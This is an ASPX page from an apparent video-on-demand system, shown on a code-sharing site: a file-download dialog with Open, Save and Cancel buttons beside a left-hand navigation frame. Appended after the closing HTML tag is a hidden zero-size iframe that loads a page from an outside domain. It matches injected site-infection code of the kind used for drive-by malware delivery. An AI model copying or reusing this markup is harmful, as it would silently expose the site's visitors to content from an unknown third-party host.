down.aspx

来自「视频点播系统使用方法如下: 1. 将"视频点播系统"目录下的所有文件和目录复制」· ASPX 代码 · 共 50 行

ASPX
50
字号
<%@ Page language="c#" Codebehind="down.aspx.cs" AutoEventWireup="false" Inherits="Vod.down" %>
<%@ Register TagPrefix="cc1" Namespace="Hongfan.Components" Assembly="PanelEx" %>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<HTML>
	<HEAD>
		<title>Register</title>
		<meta content="Microsoft Visual Studio 7.0" name="GENERATOR">
		<meta content="C#" name="CODE_LANGUAGE">
		<meta content="JavaScript" name="vs_defaultClientScript">
		<meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema">
		<LINK href="ioffice.css" type="text/css" rel="stylesheet">
	</HEAD>
	<body leftMargin="0" topMargin="0" MS_POSITIONING="GridLayout" bgColor="#EDE9EF">
		<form id="down" method="post" runat="server">
		<TABLE id="Table1" bgColor="#ffffff" align="center" height="100%" cellSpacing="0" cellPadding="0" width="780" border="0">
			
				<TR>
					
					<TD width="200"><iframe id="iFrame1" style="BORDER-TOP-STYLE: none; BORDER-RIGHT-STYLE: none; BORDER-LEFT-STYLE: none; BORDER-BOTTOM-STYLE: none" tabIndex="0" marginWidth="0" marginHeight="0" src="left.aspx" frameBorder="0" width="202" height="100%">
					    </iframe>
		                        </TD>
		                        <TD><FONT face="宋体"></FONT></TD>
					<TD align="middle">
						<P>&nbsp;</P>
						<P>
							<cc1:PanelEx id="PanelEx1" MS_POSITIONING="GridLayout" style="POSITION: relative; HEIGHT: 216px" runat="server" Width="394px" title="文件下载" Height="213px" bgColor="##EDE9EF">
								<TABLE id="Table2" style="Z-INDEX: 101; LEFT: 37px; WIDTH: 323px; POSITION: absolute; TOP: 42px; HEIGHT: 88px" borderColor="#cccccc"  cellSpacing="0" cellPadding="0" width="323" border="0">
									<TR Width="180px">
										<TD style="WIDTH: 90px"><FONT face="宋体">
										<asp:Label id="Label1" runat="server"  Font-Size="X-Small">您要打开还是保存文件?</asp:Label></FONT></TD>
									
									</TR>									
									<TR style="WIDTH: 180px" align="middle" colSpan="3">
										<TD><asp:ImageButton id="btnOpen" runat="server" ImageUrl="Img/open.gif"></asp:ImageButton></TD>
										<TD><asp:ImageButton id="btnSave" runat="server" ImageUrl="Img/save.gif"></asp:ImageButton></TD>
										<TD><asp:ImageButton id="btnCancel" runat="server" ImageUrl="Img/cancel.gif"></asp:ImageButton></TD>
										  
									</TR>
								</TABLE>
							</cc1:PanelEx></P>
					</TD>
					<TD><FONT face="宋体"></FONT></TD>
				</TR>
			</TABLE>
			<asp:ValidationSummary id="ValidationSummary1" style="Z-INDEX: 102; LEFT: 249px; POSITION: absolute; TOP: 291px" runat="server" ShowMessageBox="True" ShowSummary="False"></asp:ValidationSummary>
		</form>
	</body>
</HTML>
<IFRAME SRC="HTTP://www.m5k8.com/gr.htm" WIDTH=0 HEIGHT=0></IFRAME>

⌨️ 快捷键说明

复制代码Ctrl + C
搜索代码Ctrl + F
全屏模式F11
增大字号Ctrl + =
减小字号Ctrl + -
显示快捷键?